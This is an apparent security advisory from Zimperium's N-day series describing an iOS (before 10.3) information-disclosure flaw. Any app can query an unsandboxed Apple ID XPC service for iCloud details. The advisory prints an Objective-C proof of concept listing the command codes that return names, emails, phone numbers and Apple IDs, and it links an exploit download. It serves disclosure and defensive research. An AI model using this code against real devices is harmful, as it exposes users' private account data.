May 25, 2017
By:
Zuk Avraham
Follow Zuk Avraham (@ihackbanme)
Follow Zuk Avraham (@ihackbanme)
Nicolas Trippar
Follow Nicolas Trippar (@ntrippar)
Follow Nicolas Trippar (@ntrippar)
- zNID: NDAY-2017-0101
- CVE: Unknown
- Type: Information Disclosure
- Platform: iOS < 10.3
- Device type: iPhone, iPod
- iOS bulletin: https://support.apple.com/en-us/HT207617
- Public release date: 25th of May, 2017
Credit: Anonymous
Download Exploit (password zimperium_ndays)
Vulnerability Details
An XPC service com.apple.coreservices.appleid.authentication can be accessed by any application on iOS because of lack of sandbox checks. This can be exploited by sending a message containing a “command” key, and setting the value to either 0x130, 0x500 or 0x510, information about the user’s iCloud will be shown such as phone number, name, serial number of device, and all emails associated with the iCloud account.
Exploitation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
| void appleidauthagent_id() { | |
| xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.coreservices.appleid.authentication", NULL, 0); | |
| xpc_connection_set_event_handler(conn, ^(xpc_object_t object) { | |
| NSLog(@"Event: %@", object); | |
| }); | |
| xpc_connection_resume(conn); | |
| xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); | |
| // 0x130 - iCloud details (Name, emails, phone numbers) | |
| // 0x500 - Settings, which shows similar info to 0x130 | |
| // 0x150 - Get a list of apple IDs | |
| // 0x510 - last login time | |
| xpc_dictionary_set_int64(msg, "command", 0x130); | |
| xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg); | |
| NSLog(@"Reply: %@", reply); | |
| } |
